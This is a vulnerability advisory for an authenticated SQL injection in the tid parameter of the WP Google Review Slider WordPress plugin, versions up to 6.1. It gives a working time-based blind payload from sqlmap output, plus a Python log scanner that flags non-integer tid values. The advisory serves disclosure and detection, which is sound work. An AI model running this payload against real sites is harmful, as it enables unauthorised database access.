WP Google Review Slider <= 6.1 - Authenticated SQL Injection



Description
The tid parameter is vulnerable to SQL injection (SQLi).

Note (WPScanTeam): v6.1 has been patched directly in the tags (https://plugins.trac.wordpress.org/browser/wp-google-places-review-slider/tags/6.1/admin/partials/templates_posts.php#L58). However, the issue can be verified with v6.0.

Proof of Concept
sqlmap identified the following injection point(s) with a total of 
---
Parameter: tid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM
(SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit
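
To check whether a site running an affected version was probed, the sketch below flags logged requests to the plugin's page whose tid value is not a plain integer. It is an added example, not part of the original advisory or the plugin's code; the log lines are constructed, and the combined log format and the /wp-admin/admin.php path are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format assumed); IPs and times are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [31/Oct/2019:10:00:01 +0000] "GET /wp-admin/admin.php?page=wp_google-templates_posts&tid=3&taction=edit HTTP/1.1" 200 5120',
    '203.0.113.7 - - [31/Oct/2019:10:00:09 +0000] "GET /wp-admin/admin.php?page=wp_google-templates_posts&tid=1%20AND%20(SELECT%205357%20FROM%20(SELECT(SLEEP(5)))kHQz)&taction=edit HTTP/1.1" 200 5120',
    '198.51.100.4 - - [31/Oct/2019:10:01:00 +0000] "GET /wp-admin/admin.php?page=other-plugin&tid=abc HTTP/1.1" 200 900',
    '198.51.100.4 - - [31/Oct/2019:10:02:00 +0000] "GET /wp-admin/admin.php?page=wp_google-templates_posts&tid=12abc HTTP/1.1" 200 5120',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
PLUGIN_PAGE = "wp_google-templates_posts"  # page value shown in the advisory
INTEGER_RE = re.compile(r"[0-9]+")         # a template id should be digits only


def bad_tid_values(url):
    """Return the decoded tid values that are not plain integers,
    but only for requests addressed to the plugin's page."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if PLUGIN_PAGE not in query.get("page", []):
        return []
    return [v for v in query.get("tid", []) if not INTEGER_RE.fullmatch(v)]


def find_suspicious(lines):
    """Return (client_ip, decoded_tid) for every log line worth reviewing."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a GET/POST request line we can parse
        bad = bad_tid_values(match.group(1))
        if bad:
            hits.append((line.split()[0], bad[0]))
    return hits


if __name__ == "__main__":
    for ip, tid in find_suspicious(SAMPLE_LOG):
        print(f"{ip}\tnon-integer tid: {tid!r}")
```

Because the check tests the expected type of tid rather than matching payload strings, it also catches encoded or obfuscated variants; the same integer-only rule is what the server-side fix should enforce.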

Affects Plugin

Fixed in version 6.2

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Original Researcher Princy Edward
Submitter Princy Edward
Submitter Website https://prinyedward.blogspot.com/
Views 4259
Verified Yes
WPVDB ID 9933

Timeline

Publicly Published 2019-10-31
Added 2019-10-31
Last Updated 2019-11-01
